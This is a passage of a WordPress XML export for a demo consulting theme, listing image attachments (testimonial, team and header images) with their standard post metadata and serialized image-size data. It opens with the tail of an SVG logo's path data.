		<path class="st0" d="M80,18.8l1-1.4c0.6,0.4,1.1,0.6,1.5,0.8c0.4,0.2,0.9,0.2,1.3,0.2c0.5,0,1-0.1,1.3-0.3s0.5-0.5,0.5-0.9    c0-0.3-0.1-0.5-0.3-0.7s-0.5-0.3-0.9-0.4l-1.6-0.3c-0.9-0.2-1.5-0.4-2-0.9c-0.4-0.4-0.7-1-0.7-1.6c0-0.8,0.3-1.5,1-2    c0.6-0.5,1.5-0.8,2.5-0.8c0.6,0,1.2,0.1,1.8,0.3c0.6,0.2,1.2,0.4,1.7,0.8l-1,1.3c-0.5-0.3-0.9-0.5-1.4-0.7    c-0.4-0.1-0.9-0.2-1.3-0.2c-0.5,0-0.8,0.1-1.1,0.3c-0.3,0.2-0.4,0.4-0.4,0.8c0,0.3,0.1,0.5,0.3,0.6c0.2,0.1,0.5,0.3,1,0.3l1.6,0.3    c0.9,0.2,1.6,0.5,2,0.9c0.4,0.4,0.7,1,0.7,1.6c0,0.4-0.1,0.8-0.3,1.2c-0.2,0.4-0.4,0.7-0.8,0.9s-0.7,0.5-1.2,0.6    c-0.5,0.1-0.9,0.2-1.4,0.2c-0.8,0-1.5-0.1-2.2-0.3S80.5,19.2,80,18.8z"></path>
		<path class="st0" d="M90.4,17.4v-5h-1.8v-1.6h1.8V8.3l2-0.4v2.9h2.5v1.6h-2.5V17c0,0.4,0.1,0.8,0.3,0.9c0.2,0.2,0.5,0.3,1,0.3    c0.2,0,0.4,0,0.6,0c0.2,0,0.4-0.1,0.7-0.2v1.7c-0.3,0.1-0.6,0.1-0.9,0.2c-0.3,0-0.6,0.1-0.9,0.1c-0.9,0-1.6-0.2-2.1-0.6    S90.4,18.3,90.4,17.4z"></path>
		<path class="st0" d="M104.3,18.7c-0.6,0.5-1.1,0.8-1.7,1c-0.6,0.2-1.2,0.3-1.9,0.3c-0.6,0-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.5-1    s-0.7-0.9-1-1.5s-0.4-1.2-0.4-1.8c0-0.7,0.1-1.3,0.3-1.8c0.2-0.6,0.5-1.1,0.9-1.5s0.9-0.7,1.4-1s1.1-0.4,1.7-0.4    c0.6,0,1.2,0.1,1.7,0.4c0.5,0.2,1,0.6,1.3,1s0.7,0.9,0.9,1.5c0.2,0.6,0.3,1.2,0.3,1.9v0.5h-6.7c0.1,0.7,0.4,1.3,0.9,1.8    s1.1,0.7,1.8,0.7c0.4,0,0.8-0.1,1.2-0.2c0.4-0.1,0.7-0.4,0.9-0.6L104.3,18.7z M100.5,12.3c-0.6,0-1.1,0.2-1.5,0.6    c-0.4,0.4-0.7,1-0.8,1.6h4.7c-0.1-0.7-0.4-1.2-0.8-1.6S101.1,12.3,100.5,12.3z"></path>
		<path class="st0" d="M106.9,19.8v-9h2v2c0.2-0.7,0.6-1.2,1-1.6s0.9-0.5,1.5-0.5c0.2,0,0.3,0,0.4,0.1c0.1,0,0.3,0.1,0.4,0.1v1.8    c-0.2-0.1-0.3-0.1-0.5-0.2s-0.4-0.1-0.6-0.1c-0.5,0-0.9,0.1-1.3,0.4c-0.4,0.3-0.7,0.6-0.9,1.1v5.9H106.9z"></path>
		<path class="st0" d="M115,9c-0.3,0-0.6-0.1-0.9-0.4s-0.4-0.5-0.4-0.9c0-0.3,0.1-0.6,0.4-0.9c0.3-0.3,0.5-0.4,0.9-0.4    c0.3,0,0.6,0.1,0.9,0.4c0.3,0.3,0.4,0.5,0.4,0.9c0,0.3-0.1,0.6-0.4,0.9S115.3,9,115,9z M116,10.8v9h-2v-9H116z"></path>
		<path class="st0" d="M118.1,15.3c0-0.7,0.1-1.3,0.4-1.8c0.2-0.6,0.6-1.1,1-1.5c0.4-0.4,0.9-0.7,1.4-1c0.6-0.2,1.2-0.4,1.8-0.4    c0.6,0,1.2,0.1,1.8,0.4s1,0.6,1.4,1s0.7,0.9,1,1.5c0.2,0.6,0.3,1.2,0.3,1.8s-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5    c-0.4,0.4-0.9,0.7-1.4,1c-0.6,0.2-1.2,0.4-1.8,0.4s-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.4-1c-0.4-0.4-0.7-0.9-1-1.5    C118.2,16.6,118.1,16,118.1,15.3z M122.6,18.2c0.7,0,1.3-0.3,1.8-0.8c0.5-0.6,0.7-1.2,0.7-2.1c0-0.9-0.2-1.6-0.7-2.1    c-0.5-0.6-1.1-0.8-1.8-0.8c-0.7,0-1.3,0.3-1.8,0.8c-0.5,0.6-0.7,1.3-0.7,2.1c0,0.8,0.2,1.5,0.7,2.1    C121.3,18,121.9,18.2,122.6,18.2z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>testi2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/about-us/testi2/</link>
		<pubDate>Tue, 08 Sep 2020 04:12:51 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/testi2.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>518</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:12:51]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:12:51]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[testi2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/testi2.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/testi2.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:90;s:6:"height";i:90;s:4:"file";s:18:"2020/09/testi2.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>testi3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/about-us/testi3/</link>
		<pubDate>Tue, 08 Sep 2020 04:12:53 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/testi3.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>519</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:12:53]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:12:53]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[testi3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/testi3.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/testi3.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:90;s:6:"height";i:90;s:4:"file";s:18:"2020/09/testi3.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg2-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/about-us/bg2-about-us/</link>
		<pubDate>Tue, 08 Sep 2020 04:13:33 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg2-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>520</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:13:33]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:13:33]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg2-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg2-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg2-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:938;s:4:"file";s:24:"2020/09/bg2-about-us.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:24:"bg2-about-us-300x147.jpg";s:5:"width";i:300;s:6:"height";i:147;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"bg2-about-us-1024x500.jpg";s:5:"width";i:1024;s:6:"height";i:500;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"bg2-about-us-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"bg2-about-us-768x375.jpg";s:5:"width";i:768;s:6:"height";i:375;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:25:"bg2-about-us-1536x750.jpg";s:5:"width";i:1536;s:6:"height";i:750;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"bg2-about-us-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"bg2-about-us-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:25:"bg2-about-us-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:25:"bg2-about-us-1200x938.jpg";s:5:"width";i:1200;s:6:"height";i:938;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/about-us/team1/</link>
		<pubDate>Tue, 08 Sep 2020 04:36:18 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>524</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:36:18]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:36:18]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:17:"2020/09/team1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:17:"team1-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:17:"team1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:17:"team1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:17:"team1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:17:"team1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/about-us/team2/</link>
		<pubDate>Tue, 08 Sep 2020 04:36:20 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>525</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:36:20]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:36:20]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:17:"2020/09/team2.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:17:"team2-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:17:"team2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:17:"team2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:17:"team2-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:17:"team2-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/about-us/team3/</link>
		<pubDate>Tue, 08 Sep 2020 04:36:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>526</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:36:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:36:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:17:"2020/09/team3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:17:"team3-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:17:"team3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:17:"team3-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:17:"team3-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:17:"team3-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/about-us/team4/</link>
		<pubDate>Tue, 08 Sep 2020 04:36:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>527</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:36:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:36:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:17:"2020/09/team4.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:17:"team4-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:17:"team4-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:17:"team4-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:17:"team4-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:17:"team4-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-value</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-core-values/pheader-value/</link>
		<pubDate>Tue, 08 Sep 2020 04:49:47 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-value.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>531</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:49:47]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:49:47]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-value]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-value.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-value.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:25:"2020/09/pheader-value.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:24:"pheader-value-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"pheader-value-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:25:"pheader-value-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"pheader-value-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:26:"pheader-value-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:25:"pheader-value-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:25:"pheader-value-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:26:"pheader-value-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:26:"pheader-value-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>flip-box1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-core-values/flip-box1/</link>
		<pubDate>Tue, 08 Sep 2020 07:02:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>533</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 07:02:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 07:02:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
